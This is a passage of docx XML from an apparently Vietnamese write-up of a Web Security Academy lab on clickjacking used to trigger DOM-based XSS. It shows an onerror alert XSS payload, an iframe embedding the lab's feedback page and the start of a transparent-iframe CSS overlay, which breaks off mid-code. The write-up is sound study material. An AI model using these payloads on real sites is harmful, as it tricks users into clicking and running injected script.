        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;img src=0 onerror=alert(1)&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="001E7D54">
        <w:t xml:space="preserve"> là một lỗ hổng XSS. Nó tạo ra một thẻ hình ảnh với đường dẫn không hợp lệ và sử dụng sự kiện </w:t>
      </w:r>
      <w:r w:rsidRPr="00F656A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>onerror</w:t>
      </w:r>
      <w:r w:rsidRPr="001E7D54">
        <w:t xml:space="preserve"> để chạy một đoạn mã JavaScript (alert(1)), khiến cửa sổ cảnh báo xuất hiện trong trình duyệt.</w:t>
      </w:r>
      <w:r w:rsidR="00F656A4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB3F21">
        <w:t>Kết quả là thấy được bảng alert hiện lên:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5ED4C9" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0056518F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C465F5A" wp14:editId="12C4F590">
            <wp:extent cx="5506218" cy="1714739"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="293982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82036" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId253"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5506218" cy="1714739"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D16099A" w14:textId="6F1BD65A" w:rsidR="00F67FB2" w:rsidRPr="00F656A4" w:rsidRDefault="00F656A4" w:rsidP="00F656A4">
      <w:r w:rsidRPr="00F656A4">
        <w:t>Có nghĩa là k</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00F656A4">
        <w:t xml:space="preserve">hi payload được thực thi, </w:t>
      </w:r>
      <w:r w:rsidR="00BB4C3E" w:rsidRPr="00F656A4">
        <w:t xml:space="preserve">thì </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00F656A4">
        <w:t>thấy một thông báo bật lên, chứng tỏ lỗ hổng đã được khai thác thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717B0B12" w14:textId="7D284FA1" w:rsidR="00F67FB2" w:rsidRDefault="00BB4C3E" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00BB4C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00BB4C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 5:</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="005D0230">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="005D0230">
        <w:t>ào phần exploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ngay bây giờ</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18649F3D" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="007B1200">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="290D3E13" wp14:editId="7C13318B">
            <wp:extent cx="6115050" cy="3474085"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="503408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08180" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId254"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="3474085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="673D97A3" w14:textId="74B14FB7" w:rsidR="00F67FB2" w:rsidRDefault="00BB4C3E" w:rsidP="00F67FB2">
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t xml:space="preserve">hử thực hiện </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="005D0230">
        <w:t>viết code</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t xml:space="preserve"> để khai thác như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EF360F" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00BB4C3E" w:rsidRDefault="00F67FB2" w:rsidP="00BB4C3E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;iframe src="https://0a440051049fe814828ac0b3004b0062.web-security-academy.net/feedback"&gt;&lt;/iframe&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F9C23B" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0056518F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0760AF1D" wp14:editId="232AAAB4">
            <wp:extent cx="6115050" cy="1792605"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1799229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29533" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId255"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="1792605"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E126938" w14:textId="254977A2" w:rsidR="00BB4C3E" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="0056518F">
        <w:t>Trong đoạn mã trê</w:t>
      </w:r>
      <w:r w:rsidR="00F656A4">
        <w:t xml:space="preserve">n </w:t>
      </w:r>
      <w:r w:rsidRPr="0056518F">
        <w:t xml:space="preserve">đã cung cấp một thẻ </w:t>
      </w:r>
      <w:r w:rsidRPr="00F656A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;iframe&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0056518F">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F656A4">
        <w:t>nơi có một đường dẫn URL trong thuộc tính src. Đoạn mã này sẽ nhúng nội dung từ trang web tại URL được cung cấp vào trang web hiện tại.</w:t>
      </w:r>
      <w:r w:rsidRPr="0056518F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9D10AD" w14:textId="514C1019" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="0056518F">
        <w:t xml:space="preserve">Tức là, trang web tại đường dẫn </w:t>
      </w:r>
      <w:hyperlink r:id="rId256" w:history="1">
        <w:r w:rsidRPr="0056518F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://0a440051049fe814828ac0b3004b0062.web-security-academy.net/feedback</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0056518F">
        <w:t xml:space="preserve"> sẽ được nhúng vào trang web mà chứa đoạn mã này thông qua thẻ &lt;iframe&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17957C04" w14:textId="7FDE3852" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="0056518F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Vấn đề xảy ra ở đây là lỗ hổng </w:t>
      </w:r>
      <w:r w:rsidRPr="00F656A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>clickjacking</w:t>
      </w:r>
      <w:r w:rsidRPr="0056518F">
        <w:t>. Clickjacking là một kỹ thuật tấn công mà kẻ</w:t>
      </w:r>
      <w:r w:rsidR="00F656A4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0056518F">
        <w:t>tấn công sẽ ẩn đi các phần của trang web trong một iframe</w:t>
      </w:r>
      <w:r w:rsidR="00F656A4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0056518F">
        <w:t>và đưa ra các phím chọn hoặc nút bấm để làm cho người dùng nhấp vào đó mà không nhận ra họ đang thực hiện hành động trên một trang web khác. Điều này có thể dẫn đến các hậu quả bảo mật như lừa đảo người dùng để thực hiện các hành động không mong muốn hoặc phá vỡ quyền riêng tư.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC35DA6" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="001E7D54">
        <w:t>Trong bài lab này, lỗ hổng clickjacking được sử dụng để kích hoạt một lỗ hổng khác gọi là DOM-based XSS (Cross-Site Scripting). Kỹ thuật này sẽ chèn mã JavaScript độc hại vào tài liệu (document) hoặc DOM của trang web mục tiêu và nó sẽ được thực thi khi người dùng truy cập trang web đó (bằng cách nhấn vào liên kết độc hại). Điều này có thể dẫn đến việc chiếm quyền kiểm soát của trang web, đánh cắp dữ liệu, hoặc thực hiện các hành động độc hại khác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEC8BFC" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00F656A4" w:rsidRDefault="00F67FB2" w:rsidP="00F656A4">
      <w:r w:rsidRPr="00F656A4">
        <w:t>Và kết quả của đoạn code khai thác trên như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C324DB" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="0056518F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36E37396" wp14:editId="4ED6242C">
            <wp:extent cx="6115050" cy="1554480"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="447886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86122" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId257"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="1554480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0769A507" w14:textId="6BEA918E" w:rsidR="00F67FB2" w:rsidRPr="00F656A4" w:rsidRDefault="00F67FB2" w:rsidP="00F656A4">
      <w:r w:rsidRPr="00F656A4">
        <w:t>Đến đây</w:t>
      </w:r>
      <w:r w:rsidR="00F656A4" w:rsidRPr="00F656A4">
        <w:t xml:space="preserve"> thì đã </w:t>
      </w:r>
      <w:r w:rsidRPr="00F656A4">
        <w:t xml:space="preserve">đã nắm được ý tưởng cũng như kĩ thuật khai thác, </w:t>
      </w:r>
      <w:r w:rsidR="00F656A4" w:rsidRPr="00F656A4">
        <w:t xml:space="preserve">tiếp theo sẽ </w:t>
      </w:r>
      <w:r w:rsidRPr="00F656A4">
        <w:t>thực hiện khai thác chính thức, sử dụng đoạn code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AECAB3F" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00AA1EC7" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>style</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64728872" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00AA1EC7" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D7BA7D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>iframe</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E9614C" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00AA1EC7" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>position</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>relative</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4658F4" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00AA1EC7" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>width</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B5CEA8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>500px</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CF7942" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00AA1EC7" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>height</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B5CEA8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>500px</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6BB30A" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00AA1EC7" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>opacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B5CEA8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0.01</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C06D35" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00AA1EC7" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>z-index</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B5CEA8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2A7DA4" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00AA1EC7" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F22F24A" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00AA1EC7" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
